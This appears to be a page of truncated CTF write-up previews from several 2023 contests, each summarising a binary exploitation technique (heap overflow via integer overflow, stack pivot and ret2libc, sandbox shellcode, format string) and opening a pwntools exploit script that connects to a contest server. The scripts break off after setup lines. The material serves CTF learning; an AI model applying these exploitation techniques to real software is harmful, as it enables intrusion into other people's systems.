BlackHat MEA 2023 - vec
The vulnerability is in this part: the if statement can be bypassed by an integer overflow, which gives us an out-of-bounds write in the heap area.
Step 1, leak the heap address. The vector template class allocates twice the current capacity when the current memory is not enough. The first two times, it asks the heap allocator for 8 bytes and then 16 bytes, and each request returns a chunk of size 0x20 (in the following text, we refer to them as chunk a and c ...
TSG CTF 2023
Poked at two PWN challenges, then logged off to catch up on homework (sad)
converter2: the c32rtomb function returns -1 if the UTF-32 character passed to it is invalid; this can be used to make the pointer point at a negative index of the array. Writing one extra group of UTF-32 character data at the tail of utf32_hexstr[3] makes it parse one group too many when parsing utf32_hexstr[3], and the flag is then carried out by the subsequent printf.
#!/usr/bin/python2
from pwn import *
# io = process('./chall')
io = remote('34.146.195.242', 40004)
ru = lambda x : io.recvuntil(x, drop = True)
sa = lambda a, b : io.sendafter(a, b)
sla = lambda a, b : io.sendlineafter ...
SEETF 2023 PWN
5 PWN challenges in total; by the time I logged on a teammate had already solved 1, and I solved the remaining 4.
Great Expectations: reading in a floating-point number partially overwrites rbp, then stack pivot + ret2libc.
#!/usr/bin/python2
from pwn import *
context.binary = 'chall'
libc = ELF('libc.so.6', checksec = False)
sa = lambda a, b : io.sendafter(a, b)
sla = lambda a, b : io.sendlineafter(a, b)
ia = lambda : io.interactive()
uu64 = lambd ...
MapleCTF 2023 lost-in-space
The page with index 200 did not have its permissions changed by mprotect, and the sandbox only allows the syscall instruction to execute inside this page, so it is enough to write shellcode that searches for this address.
Because the search runs over an irregular graph (two directed edges pointing at the same node, cycles, and so on), a plain DFS/BFS is very inefficient and may loop forever (searching the nodes of one cycle over and over), so marking pages that have already been searched improves the success rate. I was too lazy to write that during the contest; just running the BFS a few more times also got through (
Also, once the address that can execute syscall has been found, directly executing execve("/bin/sh", 0, 0) crashes (my guess is that the program munmaps too many addresses, so addresses that were originally valid become invalid, and the sh process reads and writes those unmapped, now-invalid addresses and crashes). After switching to an orw shellcode the flag could be read normally.
#! ...
香山杯 2023 PWN
Move: stack pivot + ret2libc
#!/usr/bin/python2
from pwn import *
io = remote('123.56.25.124', 22278)
context.binary = 'pwn'
libc = ELF('libc.so.6', checksec = False)
rc = lambda n : io.recv(n)
sa = lambda a, b : io.sendafter(a, b)
ia = lambda : io.interactive()
uu64 = lambda x : u64(x.ljust(8, b'\x00'))
pop_rdi = 0x0000000000401353
got = ...
柏鹭杯 2023 PWN
I completely forgot about this contest at first, and only remembered it halfway through a morning class when I saw teammates talking about it (
heap: a hand-written heap allocator; the bug is a heap overflow. Chunks smaller than 0x80 behave like a cache and can be used to hijack the next pointer for an arbitrary-address allocation; chunks larger than 0x80 get an address from the ELF segment written into the chunk header after free, which can be used to leak the ELF base. Finally, use the controllable arbitrary-address allocation to hijack a function pointer called inside malloc to the backdoor.
#!/usr/bin/python2
from pwn import *
# io = process('./heap')
io = remote('8.130.86.205', 20199)
context.binary = 'hea ...
HITCON CTF 2023 - SUBformore
At first I wanted to attack dl's link_map; it worked locally, but I spent ages debugging it against remote... In between I thought it was a libc version problem and tried all sorts of libc versions, and even brought up docker with the dockerfile they provided and got it working in local docker, but remote still failed. In the end, through a single-byte leak, I found that the remote and local libc seemed identical except for the data in the GOT (the worst I've ever been burned by a remote environment: it worked locally two hours before first blood came out, but first blood was lost just because the GOT data differed between the remote and local libc......
Had I known, I would have just gone for io_file from the start (
#!/usr/bin/python2
from pwn import *
# io = process(['./lessequalmore', 'chal.txt'])
io = remote('chal-lessequalmore.chal.hitconctf.com', ...
TFC CTF 2023 - INJ
When I got on, the other teammates had already solved all the PWN challenges except one, so I half-heartedly did the last PWN, INJ; in the end the team's big shots carried us to first place.
The challenge's sandbox
Use shellcode to switch to 32-bit mode and do ORW; note that the file descriptor returned by open on remote may not be 3, so mov ebx, eax is needed to set the fd for read.
#!/usr/bin/python2
from pwn import *
context.binary = 'inj'
sd = lambda x : io.send(x)
sa = lambda a, b : io.sendafter(a, b)
def pwn(ch):
    global io
    glob ...
巅峰极客 2023 初赛
Solved it half an hour after the contest ended; I'm an idiot.
PWN: linkmap: write the pointers from the GOT to the bss segment, then partially overwrite the function pointer for read to write; one hexadecimal digit has to be brute-forced.
#!/usr/bin/python2
from pwn import *
context.binary = 'ezzzz'
elf = ELF('ezzzz', checksec = False)
libc = ELF('libc.so.6', checksec = False)
rc = lambda n : io.recv(n)
sd = lambda x ...
HWS2023夏令营选拔赛
Solved all the PWN challenges: one second blood plus one third blood.
PWN: fmt: format string
#!/usr/bin/python2
from pwn import *
context.binary = 'fmt'
libc = ELF('libc.so.6', checksec = False)
io = remote('60.204.140.184', 30137)
ru = lambda x : io.recvuntil(x, drop = True)
sla = lambda a, b : io.sendlineafter(a, b)
ia = lambda : io.interactive()
uu64 = lambda x : u64(x.ljust(8, '\x00'))
lib ...
